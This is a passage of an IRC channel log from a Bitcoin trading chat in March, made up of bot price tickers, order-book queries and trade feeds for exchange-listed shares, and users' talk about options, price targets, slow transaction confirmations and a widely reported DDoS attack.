over 80.0 USD, worth 1092667.62994 USD in total. | Data vintage: 50.4148 seconds Mar 27 18:29:58 [HAVELOCK:SDICE] 1D: 0.45300000 / 0.46644661 / 0.47500000 (32 shares, 14.92629165 BTC), 7D: 0.40010000 / 0.48668579 / 0.53000000 (1220 shares, 593.75665772 BTC), 30D: 0.37000000 / 0.54086072 / 0.68950000 (5570 shares, 3012.59421043 BTC) Mar 27 18:30:03 !ticker h vtx Mar 27 18:30:04 [HAVELOCK:VTX] 1D: 0.47000000 / 0.60045594 / 0.73925000 (263 shares, 157.91991127 BTC), 7D: 0.38280000 / 0.42498831 / 0.79900000 (11466 shares, 4872.91591485 BTC), 30D: 0.38280000 / 0.42498831 / 0.79900000 (11466 shares, 4872.91591485 BTC) Mar 27 18:30:09 !ticker h HIM Mar 27 18:30:10 [HAVELOCK:HIM] 1D: 1.65000000 / 1.78333333 / 1.85000000 (27 shares, 48.15000000 BTC), 7D: 1.41000000 / 1.78399689 / 2.00000000 (193 shares, 344.31140034 BTC), 30D: 1.40000000 / 2.09413745 / 18.00000000 (661 shares, 1384.22485269 BTC) Mar 27 18:30:14 having sex life dependent on btcusd rate, goat? Mar 27 18:30:20 uh oh Mar 27 18:30:23 thestrin1puller: got it. i'll have that to you sometime later today :) Mar 27 18:31:10 ;;calc .24 / 3 Mar 27 18:31:10 0.08 Mar 27 18:31:54 so, i had a price target of 100 Mar 27 18:32:05 what should i update that to? Mar 27 18:32:10 opinions of course Mar 27 18:32:15 Christ, 5 hours and the transaction still didn't get confirmed Mar 27 18:32:25 but curious, 1/1/2014 BTCUSD = ? Mar 27 18:32:33 Schadenfreude: a no fee tx? Mar 27 18:32:59 Schadenfreude: sry... seems i should raise txfee... it's 0.00001 atm Mar 27 18:32:59 those seem to be taking 1 to 2 days on avg currently Mar 27 18:33:14 2014 is way to far away to predict Mar 27 18:33:17 too* Mar 27 18:35:11 ;;bids 88.5 Mar 27 18:35:15 There are currently 1048.5819 bitcoins demanded at or over 88.5 USD, worth 93100.3146358 USD in total. | Data vintage: 0.0062 seconds Mar 27 18:35:18 ;;asks 89 Mar 27 18:35:18 There are currently 776.95498 bitcoins offered at or under 89.0 USD, worth 69124.0795319 USD in total. | Data vintage: 3.6501 seconds Mar 27 18:35:29 nice, we dont see a bid wqall often Mar 27 18:35:39 88.88 Mar 27 18:37:51 ;;asks 89 Mar 27 18:37:52 There are currently 727.55853 bitcoins offered at or under 89.0 USD, worth 64735.6745809 USD in total. | Data vintage: 33.1093 seconds Mar 27 18:37:58 So it shouldn't come through until the day after tomorrow? Sucks Mar 27 18:37:59 lol Mar 27 18:38:14 ;;asks 89 Mar 27 18:38:15 There are currently 727.55853 bitcoins offered at or under 89.0 USD, worth 64735.6745809 USD in total. | Data vintage: 56.1564 seconds Mar 27 18:38:41 ;;tslb Mar 27 18:38:43 oh lol Mar 27 18:38:45 Time since last block: 1 hour, 1 minute, and 55 seconds Mar 27 18:38:52 http://www.bbc.co.uk/news/technology-21954636 Mar 27 18:39:36 88.99 Mar 27 18:39:45 uh Mar 27 18:39:48 whoa Mar 27 18:40:25 46k btc sent in last block lol Mar 27 18:40:47 and block size was 462?? Mar 27 18:40:51 millions of dollars Mar 27 18:40:53 lol Mar 27 18:40:54 i thought that was a no no? Mar 27 18:41:13 dude it took 1 hour for a block to be found Mar 27 18:41:16 get over it Mar 27 18:41:18 DEAL WITH IT Mar 27 18:41:28 462 kb? this will fork the chain again right? Mar 27 18:41:47 no Mar 27 18:41:48 hmm maybe not Mar 27 18:41:53 well 89 Mar 27 18:42:02 ;;asks 89 Mar 27 18:42:02 There are currently 467.83979 bitcoins offered at or under 89.0 USD, worth 41636.9315048 USD in total. | Data vintage: 25.5033 seconds Mar 27 18:42:13 Chaang-Noi: that issue should be resoled Mar 27 18:42:17 *resolved Mar 27 18:42:39 the issue was around > 800k iirc Mar 27 18:42:58 depending on bdb config Mar 27 18:43:13 there was a patch for the older clients, and the newer ones just don't care. and most of the older clients have upgraded Mar 27 18:43:32 http://luke.dashjr.org/programs/bitcoin/files/charts/branches.html Mar 27 18:43:33 okay thanks Mar 27 18:43:46 about to bust over 89 Mar 27 18:43:48 that charts the current client distribution Mar 27 18:44:17 hackers and spammers will be the new weather, "How's the 'net today?" "oh a little slow, big ddos in China holding the east" Mar 27 18:45:25 ;;asks 89 Mar 27 18:45:25 There are currently 173.42393 bitcoins offered at or under 89.0 USD, worth 15434.7301313 USD in total. | Data vintage: 90.7996 seconds Mar 27 18:47:01 ;;asks 89 Mar 27 18:47:03 ;;ticker Mar 27 18:47:04 There are currently 6.9601388 bitcoins offered at or under 89.0 USD, worth 619.45235676 USD in total. | Data vintage: 0.0013 seconds Mar 27 18:47:05 BTCUSD ticker | Best bid: 88.99000, Best ask: 89.00000, Bid-ask spread: 0.01000, Last trade: 89.00000, 24 hour volume: 69625.16135317, 24 hour low: 76.82000, 24 hour high: 89.00000, 24 hour vwap: 82.61294 Mar 27 18:47:08 ;;asks 89.4 Mar 27 18:47:09 There are currently 227.02482 bitcoins offered at or under 89.4 USD, worth 20262.5963564 USD in total. | Data vintage: 5.1871 seconds Mar 27 18:48:12 and its gone Mar 27 18:48:21 ;;ticker Mar 27 18:48:21 BTCUSD ticker | Best bid: 88.99000, Best ask: 89.24499, Bid-ask spread: 0.25499, Last trade: 89.24500, 24 hour volume: 69606.26929719, 24 hour low: 76.82000, 24 hour high: 89.00000, 24 hour vwap: 82.61516 Mar 27 18:48:41 I guess I should have slept in Mar 27 18:48:47 wouldn't have sold at 85.5 Mar 27 18:49:27 it's ok Bugpowder, this is just a bubble. Mar 27 18:49:35 heh Mar 27 18:49:36 well Mar 27 18:49:47 what was vwap when you sold? Mar 27 18:49:57 sold coins Mar 27 18:49:58 not calls Mar 27 18:50:09 i see Mar 27 18:50:13 no sense in selling calls unless vwap is dipping Mar 27 18:52:00 C750Ns on coinbr are ask .31 bidding .20... ...... shit I need spreadsheet. Mar 27 18:52:17 Namworld has one Mar 27 18:52:31 ya? Mar 27 18:52:36 yeah its pretty nice Mar 27 18:52:53 hrm, you think he'd let a noob take look at it and possibly us it? Mar 27 18:52:58 https://docs.google.com/spreadsheet/ccc?key=0AvwwyRGyc1WgdGxfRk5SS0hxT1lsVmdLdU1QY0RveGc Mar 27 18:53:12 *use Mar 27 18:54:15 mp wake up, i needs mah withdrawal :) Mar 27 18:54:48 also might need a bigger tx fee with current delays Mar 27 18:55:08 ;;ticker Mar 27 18:55:09 BTCUSD ticker | Best bid: 89.10000, Best ask: 89.24500, Bid-ask spread: 0.14500, Last trade: 89.01050, 24 hour volume: 69610.04605213, 24 hour low: 76.82000, 24 hour high: 89.24500, 24 hour vwap: 82.63423 Mar 27 18:55:40 thanks Bugpowder ! Mar 27 18:55:47 thank Namworld Mar 27 18:56:01 [HAVELOCK] [SDICE] 6 @ 0.46500025 = 2.79 BTC [-] Mar 27 18:56:02 [HAVELOCK] [SDICE] 4 @ 0.46500011 = 1.86 BTC [-] Mar 27 18:56:04 [HAVELOCK] [SDICE] 5 @ 0.465 = 2.325 BTC [-] Mar 27 18:56:04 [HAVELOCK] [SDICE] 3 @ 0.46 = 1.38 BTC [-] Mar 27 18:56:05 [HAVELOCK] [SDICE] 3 @ 0.459 = 1.377 BTC [-] Mar 27 18:56:06 [HAVELOCK] [SDICE] 3 @ 0.458 = 1.374 BTC [-] Mar 27 18:56:24 well that's exactly what i needed. Now I just gotta play with it and digest it. Mar 27 18:56:43 Namworld: I'm looking at your spreadsheet, THANK YOU! Mar 27 18:58:59 well while 2014 is far away, and there will be a big variance...$200? Mar 27 18:59:12 9 months out will be a crap shoot, but let's shoot some craps Mar 27 18:59:23 no point imo Mar 27 18:59:28 ok fair enough Mar 27 19:00:13 its pretty much counting your chicks before they hatch Mar 27 19:00:39 think about the last 3mos of bitcoin Mar 27 19:00:48 and then the 3mos prior Mar 27 19:00:50 and again Mar 27 19:00:55 yes exactly Mar 27 19:01:09 you have to have SOME idea of what you think is going to happen Mar 27 19:01:16 I think we'll hit 200 this year Mar 27 19:01:20 that is my price estimate Mar 27 19:01:22 at this point Mar 27 19:01:34 Up, up, up until bad news or some mega whale surfaces Mar 27 19:01:35 sheeit Mar 27 19:01:36 i'll revise if there is news or trends Mar 27 19:02:03 but if things continue along their current trends, i am guessing 200 Mar 27 19:02:24 things could easily get exponential from here Mar 27 19:02:44 o rnot Mar 27 19:02:47 they could...that would mean we hit 200 by 2014 Mar 27 19:02:57 way higher than that Mar 27 19:03:06 you can't get higher without going through 200 Mar 27 19:03:14 ? Mar 27 19:03:19 meaning me hit 200 on the way to something higher Mar 27 19:03:25 and i revise estimates again Mar 27 19:03:36 so you are telling me that numbers go in order? Mar 27 19:03:36 sell off? Mar 27 19:03:38 my expectations were 100 by year end Mar 27 19:03:50 and now i think that was too conservative Mar 27 19:04:12 100 in 1-10 days Mar 27 19:04:15 yes Mar 27 19:04:16 is totally possible Mar 27 19:04:18 i agree Mar 27 19:04:25 so now i need to adjust my price target Mar 27 19:04:30 given the current situation Mar 27 19:04:34 so i am guessing 200 now Mar 27 19:04:42 for 2014? Mar 27 19:05:03 BY 2014 Mar 27 19:05:05 if you are basing your target off of history, that's pretty conservative Mar 27 19:05:18 not a target of on this date...but rather BY this date Mar 27 19:05:40 :/ Mar 27 19:06:23 90 fell Mar 27 19:06:37 it did? Mar 27 19:06:41 ? Mar 27 19:06:42 no 91 fell Mar 27 19:06:53 ;;ticker Mar 27 19:06:54 BTCUSD ticker | Best bid: 88.00000, Best ask: 88.17056, Bid-ask spread: 0.17056, Last trade: 88.17056, 24 hour volume: 69973.08329761, 24 hour low: 76.82000, 24 hour high: 89.24500, 24 hour vwap: 82.68129 Mar 27 19:07:00 on bitfloor or sumth? Mar 27 19:07:02 jurov from the future Mar 27 19:07:11 jurov lol Mar 27 19:07:14 o i was looking to bitfloor Mar 27 19:07:14 not too distant Mar 27 19:07:33 ;;asks 90 Mar 27 19:07:33 There are currently 3604.954 bitcoins offered at or under 90.0 USD, worth 323360.286725 USD in total. | Data vintage: 3.8502 seconds Mar 27 19:07:44 wont be before my bedtime Mar 27 19:07:54 just dont break 100 before i wake! Mar 27 19:09:24 oh wow, bitfloor is at 91.95 Mar 27 19:09:32 currently? Mar 27 19:09:36 and getting taken at that price, right now Mar 27 19:09:44 damn Mar 27 19:09:55 yep Mar 27 19:10:00 Bugpowder: that spreadsheet tells me that all options, bought at their current price would be a loser. Mar 27 19:10:00 the bulls are rampaging today Mar 27 19:10:20 deadweasel: yep...you are buying them expecting a rise in price Mar 27 19:10:39 but the rise is already here, so the price of them has gone up? Mar 27 19:10:42 deadweasel: also, probably you should never take the ask Mar 27 19:10:44 deadw, raise the predicted price then! Mar 27 19:10:47 :) Mar 27 19:10:55 you mean buy btc? Mar 27 19:10:56 :) Mar 27 19:11:03 we are limited by the top of 75C Mar 27 19:11:06 $depth c750t Mar 27 19:11:08 smickles: O.BTCUSD.C750T Bids: ['5 @ 0.11564277', '1000 @ 0.11255256'] Mar 27 19:11:09 smickles: Asks: ['1000 @ 0.24999998', '1005 @ 0.24999999'] Mar 27 19:11:11 at expiration we can play up to 200 Mar 27 19:11:25 ;;calc 75/(1-.24999) Mar 27 19:11:25 99.9986666844 Mar 27 19:11:52 so $100 to be profitable? Mar 27 19:11:54 you buy c75 on it's own expecting 100 to be broken and held, currently Mar 27 19:12:02 ok Mar 27 19:12:07 odds of hitting a 100vwap before deadline are risky Mar 27 19:12:15 ;;bc,24hprc Mar 27 19:12:16 82.98 Mar 27 19:12:21 i sincerely doubt it. Mar 27 19:12:34 also, is it 24hprc or 24vwap? I though tit was vwap Mar 27 19:12:41 * thought IT Mar 27 19:12:56 deadweasel: bc,24hprc is the 24h vwap across all exchanges on bitcoincharts Mar 27 19:12:58 prc Mar 27 19:13:07 and that's the number mpex uses Mar 27 19:13:25 Most Online Today: 2285. Most Online Ever: 3809 (June 20, 2011, 02:56:13 AM) Mar 27 19:13:27 ;;bc, prc Mar 27 19:13:28 Error: "bc," is not a valid command. Mar 27 19:13:42 why is the ;;bc,24hprc different than the vwap on ;;ticker -- is it because ;;ticker is taking Gox only values? Mar 27 19:13:56 ticker's vwap is just gox Mar 27 19:13:59 ;;ticker Mar 27 19:13:59 BTCUSD ticker | Best bid: 87.24000, Best ask: 87.99980, Bid-ask spread: 0.75980, Last trade: 87.20000, 24 hour volume: 71455.63235364, 24 hour low: 76.82000, 24 hour high: 89.24500, 24 hour vwap: 82.79927 Mar 27 19:14:05 ;;bc,24hprc Mar 27 19:14:06 82.98 Mar 27 19:14:31 yes vwap is only gox i think Mar 27 19:15:06 no, it should be all exchanges Mar 27 19:15:27 it was quite different fron gox-reported weighted price Mar 27 19:16:01 yes smickles is right Mar 27 19:16:43 thanks jurov, smickles Mar 27 19:17:13 wow the subreddit has gone hockeystick i think Mar 27 19:18:38 and only 25 mill to 1 billion dollars Mar 27 19:22:41 MJR_: subscribers? Mar 27 19:23:18 21k Mar 27 19:25:24 you guys should go bet on this using my ref: http://bitbet.us/bet/206/bitcoin-market-cap-above-1-billion-before-end/?ref=1A5HtmuQzvTvhcawNFUbRH1pbQ1qY72YHR Mar 27 19:25:34 unconfirmed txs increase by 200-300/hour Mar 27 19:27:22 ;;tslb Mar 27 19:27:25 Time since last block: 38 minutes and 3 seconds Mar 27 19:27:31 3600 waiting transactions Mar 27 19:27:43 maybe it's this internet slowdown news? Mar 27 19:28:02 how do you get a ref, pizzaman1337 ? Mar 27 19:28:02 deadweasel: 21,779 Mar 27 19:28:23 which is 2,000 more than like a day or two ago i think Mar 27 19:28:24 deadweasel: http://bitbet.us/faq/#43 Mar 27 19:29:07 well that is simple and awesome! Mar 27 19:29:19 MJR_: that is a nice increase. Mar 27 19:32:26 pizzaman1337: done! :) Mar 27 19:32:39 [MPEX] [S.MPOE] 10893 @ 0.00061253 = 6.6723 BTC [+] Mar 27 19:33:16 ;;ticker Mar 27 19:33:18 BTCUSD ticker | Best bid: 87.36201, Best ask: 87.88000, Bid-ask spread: 0.51799, Last trade: 87.88000, 24 hour volume: 71664.46749013, 24 hour low: 76.82000, 24 hour high: 89.24500, 24 hour vwap: 82.96333 Mar 27 19:33:19 ;;goxlag Mar 27 19:33:20 1.501887 seconds Mar 27 19:33:31 deadweasel: :) Mar 27 19:52:00 [HAVELOCK] [VTX] 3 @ 0.593 = 1.779 BTC [+] Mar 27 19:58:39 ASICMINER raising hashing target from 50TH for second batch to 200TH!! Mar 27 19:59:09 (slightly lowering divs for the next three weeks to fund the extra capacity) Mar 27 19:59:15 lol bitcoind Mar 27 19:59:22 asks for password via gui for new addy Mar 27 19:59:25 but not via console Mar 27 19:59:26 ftw Mar 27 20:00:58 ah nvm misread.. the 2nd batch is still 50TH, but he is putting together a 3rd batch of 200TH. Mar 27 20:01:24 err third batch of 150TH. Mar 27 20:03:07 http://i0.kym-cdn.com/entries/icons/original/000/006/026/futuramafry.jpg Mar 27 20:04:39 hope the price falls, i'd love to scoop up more asicminer Mar 27 20:05:44 you can in turn lend it to mp :) Mar 27 20:06:47 well.. not sure how far shorting would go.. I don't believe anyone owns these shares on margin, so guessing not too many weak hands. Mar 27 20:07:38 i wouldn't be shorting Mar 27 20:07:45 just trying to get best price Mar 27 20:10:25 [BTCTC] [ASICMINER-PT] 1 @ 0.72 BTC [-] Mar 27 20:12:01 [HAVELOCK] [VTX] 1 @ 0.593 BTC [+] Mar 27 20:13:13 The problem as I see it is that if someone wants to get in on btc without too much work, they have three choices 1) buy btc 2) buy mining gear 3) buy mining stocks. As long as AM is leading the metrics, it will carry a premium and be a go to investment, since modern mining gear that will last more than a month or so, can't really be easily had. Mar 27 20:14:09 (and owning plain btc seems less interesting) Mar 27 20:17:25 I'll admit that AM probably has from a strict value investment pov prolly gotten ahead of itself.. but it's a better deal than a) owning fiat, b) building/ordering rigs now, c) other mining stocks. Mar 27 20:18:01 and certainly less risky than leverage plays. Mar 27 20:19:00 [HAVELOCK] [VTX] 2 @ 0.593 = 1.186 BTC [+] Mar 27 20:19:16 any one know how much each BFL chip produces Hashrate wise? Mar 27 20:19:21 0 Mar 27 20:19:52 in theory I mean… IE Full prod run is something like 70k+ chips. Mar 27 20:20:11 want to know how many TH we are looking at if they ever ship. Mar 27 20:20:26 (Obviously if they ship it will take a long time to clear backlog) Mar 27 20:21:21 [BTCTC] [ASICMINER-PT] 1 @ 0.68 BTC [-] Mar 27 20:21:23 [BTCTC] [ASICMINER-PT] 49 @ 0.68 = 33.32 BTC [-] Mar 27 20:21:27 i dunno, 0 looks like a real possiility right now Mar 27 20:21:58 heh Mar 27 20:22:17 they wouldn't still be taking orders.. if it was 0.. Mar 27 20:22:37 why not? Mar 27 20:22:40 hehe Mar 27 20:23:05 for example, what if their chip design simply doesnt work Mar 27 20:23:05 I have a preorder as a money transfer request to BFL's bank..looks like it has a preorder number on it, but never sent the transfer..they say it will hold my position though...I wonder. Mar 27 20:23:20 and they are just not admitting yet Mar 27 20:23:26 and then they go back to drawing board Mar 27 20:23:29 for 3+mos Mar 27 20:30:34 I'm expecting them to ship by June. Mar 27 20:30:48 err by some time in June Mar 27 20:31:01 closer to June than now. Mar 27 20:31:08 i suspect there really is a big problem with their system Mar 27 20:31:14 assuming its not just a scam Mar 27 20:32:10 ;;ticker Mar 27 20:32:14 ;;goxlag Mar 27 20:32:39 I heard June today myself. Mar 27 20:32:41 ;;bueller Mar 27 20:32:43 ;;bueller Mar 27 20:32:54 SAVE FERRIS Mar 27 20:33:01 :) Mar 27 20:33:32 ThickAsThieves: your AM div guess was a bit low Mar 27 20:33:36 er high Mar 27 20:33:44 only a little Mar 27 20:34:07 21% off :) Mar 27 20:34:15 what the fuck is with this esnding satoshis idiocy Mar 27 20:34:20 this is the nature of guesses Mar 27 20:34:45 at this point i'm not sure Mar 27 20:34:55 i dont see what it solves Mar 27 20:35:09 chinese logic Mar 27 20:35:45 Hard to know that friedcat was going to choose this period of time to invest in another 150TH of gear. his guess prolly would have been better had they not. Mar 27 20:35:57 actually it would have been low in that case.. Mar 27 20:36:22 chinese proverb say “If you are depressed, you are living in the past. If you are anxious, you are living in the future. Peace is only found in the present.” Mar 27 20:38:03 we're approaching the first wall to get to 90 Mar 27 20:38:09 can we save the princess? Mar 27 20:41:15 ;;tslb Mar 27 20:41:21 Walls/spoons http://www.youtube.com/watch?v=dzm8kTIj_0M Mar 27 20:41:24 :( Mar 27 20:45:20 [BTCTC] [BTC-TRADING-PT] 5 @ 0.11119 = 0.556 BTC [-] Mar 27 20:46:00 $1 spread Mar 27 20:51:02 o.btc Mar 27 20:51:14 that DDoS is crazy Mar 27 20:51:18 300Gbps Mar 27 20:51:27 <[\\\]> who is getting it now? Mar 27 20:51:28 oh? where? Mar 27 20:51:48 apparently cyberbunker is where the ddos is originating Mar 27 20:51:52 but it is targeted at spamhaus Mar 27 20:52:05 unfortunately they are leveraging dns servers Mar 27 20:52:10 so some people are getting slow downs Mar 27 20:52:28 tx cnfs are slow Mar 27 20:52:31 spamhaus should redirect to whitehouse.gov Mar 27 20:53:07 thats a quick way to get someone to notice Mar 27 20:53:09 lol Mar 27 20:53:24 i really want to see an alternate mesh network spring up Mar 27 20:53:32 with community owned hardware Mar 27 20:54:16 redirect them to litecoin Mar 27 20:54:41 hellooooo gribble Mar 27 20:54:43 MJR_: I've heard the meshnet in seatle is pretty good Mar 27 20:54:46 ;;tslb Mar 27 20:59:20 ;;ticker Mar 27 21:03:56 [BTCTC] [GSDPT] 75 @ 0.00414 = 0.3105 BTC [+] Mar 27 21:08:01 [MPEX] [S.DICE] 2000 @ 0.0044799 = 8.9598 BTC [+] Mar 27 21:08:11 ;;goxlag Mar 27 21:09:00 [HAVELOCK] [SDICE] 2 @ 0.46 = 0.92 BTC [+] Mar 27 21:09:02 [HAVELOCK] [SDICE] 3 @ 0.45700001 = 1.371 BTC [-] Mar 27 21:09:03 [HAVELOCK] [SDICE] 3 @ 0.457 = 1.371 BTC [-] Mar 27 21:09:04 [HAVELOCK] [SDICE] 3 @ 0.456 = 1.368 BTC [-] Mar 27 21:09:05 [HAVELOCK] [SDICE] 9 @ 0.455 = 4.095 BTC [-] Mar 27 21:10:08 97.60 ask on bitfloor...it could hit 100 there today Mar 27 21:10:11 lol Mar 27 21:10:19 [MPEX] [S.DICE] 591 @ 0.00448 = 2.6477 BTC [+] Mar 27 21:10:21 [MPEX] [S.DICE] 5409 @ 0.00448 = 24.2323 BTC [+] Mar 27 21:11:00 [HAVELOCK] [SDICE] 11 @ 0.455 = 5.005 BTC [-] Mar 27 21:11:00 [HAVELOCK] [SDICE] 3 @ 0.455 = 1.365 BTC [-] Mar 27 21:11:02 [HAVELOCK] [SDICE] 3 @ 0.454 = 1.362 BTC [-] Mar 27 21:11:03 [HAVELOCK] [SDICE] 3 @ 0.4531 = 1.3593 BTC [-] Mar 27 21:11:04 [HAVELOCK] [SDICE] 3 @ 0.45205 = 1.3562 BTC [-] Mar 27 21:11:05 [HAVELOCK] [SDICE] 3 @ 0.452 = 1.356 BTC [-] Mar 27 21:11:06 [HAVELOCK] [SDICE] 1 @ 0.451 BTC [-] Mar 27 21:11:07 [HAVELOCK] [SDICE] 33 @ 0.45 = 14.85 BTC [-] Mar 27 21:11:27 maybe havelock sdice will finally come down to market Mar 27 21:11:57 its been preetty close lately Mar 27 21:12:53 smickles: I am going to have to look at that...nyc should have had one a long time ago Mar 27 21:13:47 topace, any chance of integrating with coinbr? Mar 27 21:14:06 integrating what ? Mar 27 21:14:12 pushing shares Mar 27 21:14:17 of sdice Mar 27 21:14:28 from havelock to coinbr? or from coinbr to havelock ? Mar 27 21:14:46 i suppose either is possible Mar 27 21:14:51 both Mar 27 21:15:19 i'd have to talk to jurov about the implementation detaisl Mar 27 21:15:25 but yea, anything is possible Mar 27 21:15:38 might be overkill for one asset, but it would be nice Mar 27 21:15:57 it only works for mpex becuase mpex issues a gpg signed receipt that i can verify and ensure uniqueness on Mar 27 21:16:17 well, such functionality is on hold at the moment Mar 27 21:16:54 hmmm... Mar 27 21:16:54 cause i don't trust the engine it's 100% reliable Mar 27 21:16:59 yet Mar 27 21:17:03 if the prc goes to 100 the 75 calls are worth it Mar 27 21:17:14 so i can do the transfers manually on request Mar 27 21:17:20 worth it? or break even? Mar 27 21:17:26 worth it Mar 27 21:17:49 nah break even Mar 27 21:17:53 hehe Mar 27 21:17:59 [HAVELOCK] [SDICE] 7 @ 0.45 = 3.15 BTC [-] Mar 27 21:18:03 maybe very very slightly worth it Mar 27 21:18:03 worth it, just barely. Mar 27 21:18:07 jurov: well if you ever get a request to push or pull from havelock, lemme know, we can do it manually Mar 27 21:18:13 1 satoshi Mar 27 21:18:32 i can use normal havelock interface, that;s not a problem Mar 27 21:19:12 just on my side checks need to be done Mar 27 21:19:19 to push to havelock yea, our normal "paste the mpex receipt" will work fine. Mar 27 21:19:48 what is the link to see expected sdice dividends? Mar 27 21:19:59 if i get a request from someone to push from havelcok to coinbr, how would i go about that ? Mar 27 21:19:59 [HAVELOCK] [SDICE] 10 @ 0.44 = 4.4 BTC [-] Mar 27 21:20:01 it's 0 mjr Mar 27 21:20:06 for this month Mar 27 21:20:38 topace, contact me then or send email (support@coinbr.com has gpg key published proper) Mar 27 21:20:44 https://bitcointalk.org/index.php?topic=80312.0 <--- mjr Mar 27 21:20:52 kk Mar 27 21:21:03 (not that i've ever had a request, but good to know) Mar 27 21:21:16 yes, it's not requested so often Mar 27 21:21:59 [HAVELOCK] [VTX] 10 @ 0.593 = 5.93 BTC [+] Mar 27 21:23:22 thanks ThickAsThieves Mar 27 21:26:38 ThickAsThieves: so it looks like no dividends this month? Mar 27 21:32:24 correct Mar 27 21:32:57 gawd damnit Mar 27 21:32:59 sdice Mar 27 21:34:28 ah well...i am thinking of doubling down Mar 27 21:37:00 [HAVELOCK] [VTX] 3 @ 0.593 = 1.779 BTC [+] Mar 27 21:40:07 [MPEX] [S.DICE] 46 @ 0.00415002 = 0.1909 BTC [-] Mar 27 21:40:09 [MPEX] [S.DICE] 165 @ 0.00415001 = 0.6848 BTC [-] Mar 27 21:40:12 [MPEX] [S.DICE] 9540 @ 0.00388018 = 37.0169 BTC [-] Mar 27 21:40:14 [MPEX] [S.DICE] 1000 @ 0.0038801 = 3.8801 BTC [-] Mar 27 21:40:15 [MPEX] [S.DICE] 1000 @ 0.00387779 = 3.8778 BTC [-] Mar 27 21:40:19 [MPEX] [S.DICE] 1000 @ 0.00385207 = 3.8521 BTC [-] Mar 27 21:40:26 [MPEX] [S.DICE] 10000 @ 0.00385206 = 38.5206 BTC [-] Mar 27 21:40:28 [MPEX] [S.DICE] 176 @ 0.0036 = 0.6336 BTC [-] Mar 27 21:40:54 aww Mar 27 21:40:59 should left my bids up Mar 27 21:41:06 put them back up Mar 27 21:41:12 you selling? Mar 27 21:41:12 theres more where that came from Mar 27 21:41:37 my btc is all tied up waiting for mp now Mar 27 21:42:28 heh Mar 27 21:42:29 ok Mar 27 21:45:00 [HAVELOCK] [SDICE] 1 @ 0.43 BTC [-] Mar 27 21:45:01 [HAVELOCK] [SDICE] 1 @ 0.432 BTC [+] Mar 27 21:45:03 [HAVELOCK] [SDICE] 1 @ 0.43 BTC [-] Mar 27 21:45:23 or maybe i'll just help incite a crash on the PTs.... Mar 27 21:46:00 Well Mar 27 21:46:06 Selling for .003999 Mar 27 21:46:32 The pain of this loss will be healed by the call profits. Mar 27 21:46:58 well...there are two choices now with sdice if you got in after the first ipo Mar 27 21:47:13 you give up, take your losses...throw the btc you have into a bond or something Mar 27 21:47:21 or double down on sdice Mar 27 21:47:32 as the price drops when others pursue strategy 1 Mar 27 21:47:38 and then reap some great dividend in april maybe Mar 27 21:47:39 I think its a great value at .00399999 Mar 27 21:47:44 hey i agree Mar 27 21:48:17 I'm just impatient Mar 27 21:48:37 is there a mechanism in place for SDICE to repay stockholders in the event MPEX somehow dies? (i'm not saying this is going to happen, I"m asking if there is a strategy) Mar 27 21:48:44 yeah Mar 27 21:48:46 well Mar 27 21:48:53 we know who the shareholders are Mar 27 21:48:54 depth is shit on PTS Mar 27 21:48:57 if mpex dies Mar 27 21:49:00 PTs* Mar 27 21:49:02 ok. Mar 27 21:49:24 The complete account contents are available as a gpg encrypted file Mar 27 21:49:28 of all users Mar 27 21:49:37 I have an old copy somewhere Mar 27 21:50:11 awesome. would passthroughs continue to operate? Mar 27 21:50:22 i dunno Mar 27 21:50:26 don't see why not Mar 27 21:50:29 me either Mar 27 21:50:31 what are the s.dice dividends like Mar 27 21:50:40 0 Mar 27 21:50:42 this month Mar 27 21:50:55 well..granted. Mar 27 21:51:01 i seriously wanna murder godaddy Mar 27 21:51:29 why are you doing business with them? namecheap.com Mar 27 21:52:19 not me, a client Mar 27 21:52:26 oh lord, i'm sorry. Mar 27 21:52:37 its virtually impossible to get this to transfet Mar 27 21:52:46 so i gave up and decided to renew Mar 27 21:52:47 well Mar 27 21:52:55 now there's this package stuck to it Mar 27 21:52:57 they make it difficult on purpose. they implemented this during SOPA, when namecheap starteds stealing their customers Mar 27 21:52:59 that cannot be removed Mar 27 21:53:23 they want $40! Mar 27 21:53:27 yeah, hate godaddy Mar 27 21:53:53 but if call them, i will surely lose $40+ in life force from stress Mar 27 21:54:01 i registered 3 domains on namecheap (btcshares, btc-etf, bitcoin-etf) like 1 week before they announced accepting bitcoins Mar 27 21:54:19 $40 is a good deal... :( Mar 27 21:54:22 lucky you Mar 27 21:54:32 Bugpowder: i wish i coiuld have paid in btc Mar 27 21:54:37 uhhh Mar 27 21:54:39 MJR_: you made money by not using BTC for that Mar 27 21:54:46 yes... Mar 27 21:54:49 i am aware Mar 27 21:54:58 but i like to support btc based businesses Mar 27 21:55:06 or ones who accept Mar 27 21:55:26 me too, i hear ya. I paid for VPN with BTC. Mar 27 21:55:34 eventually anyone who sells at $100 will be like i could have waited for a million Mar 27 21:56:01 but todays rate i paid 300$ for 1 year of VPN Mar 27 21:56:08 yeah... Mar 27 21:56:11 :) Mar 27 21:56:13 it's ok Mar 27 21:56:15 we're helping Mar 27 21:56:17 this is all more accounting than anything else Mar 27 21:56:19 ourselves be poor Mar 27 21:56:20 yes Mar 27 21:56:26 true Mar 27 21:56:33 and after all....i may lose out on paper profits Mar 27 21:56:46 but i have never payed close to 80 for a bitcoin Mar 27 21:56:48 you may. we all might. Mar 27 21:57:04 think last time i dumped fiat was at 49 Mar 27 21:57:09 lol, i bought 5 at $67 in the dip, just because I hpe for BTCUSD at $1000 Mar 27 21:57:15 :)( Mar 27 21:57:31 i bought at 26...that was my biggest buy, it was around 30 or so Mar 27 21:57:32 gotta go ya'll, thanks for all the help today with the options OIX! many thanks! Mar 27 21:58:00 [HAVELOCK] [SDICE] 1 @ 0.43 BTC [-] Mar 27 21:58:01 [HAVELOCK] [SDICE] 1 @ 0.429 BTC [-] Mar 27 21:58:03 [HAVELOCK] [SDICE] 3 @ 0.422 = 1.266 BTC [-] Mar 27 21:58:04 [HAVELOCK] [SDICE] 2 @ 0.42150001 = 0.843 BTC [-] Mar 27 21:58:05 [HAVELOCK] [SDICE] 8 @ 0.4215 = 3.372 BTC [-] Mar 27 21:58:06 [HAVELOCK] [SDICE] 3 @ 0.41 = 1.23 BTC [-] Mar 27 21:58:07 [HAVELOCK] [SDICE] 2 @ 0.4002 = 0.8004 BTC [-] Mar 27 21:59:00 [HAVELOCK] [SDICE] 3 @ 0.4002 = 1.2006 BTC [-] Mar 27 21:59:01 [HAVELOCK] [SDICE] 7 @ 0.4001 = 2.8007 BTC [-] Mar 27 22:01:25 time to unleash hell on an innocent customer support person... Mar 27 22:18:58 new asset launched https://bitfunder.com/asset/btcQuick Mar 27 22:19:13 over 250btc sold (half) 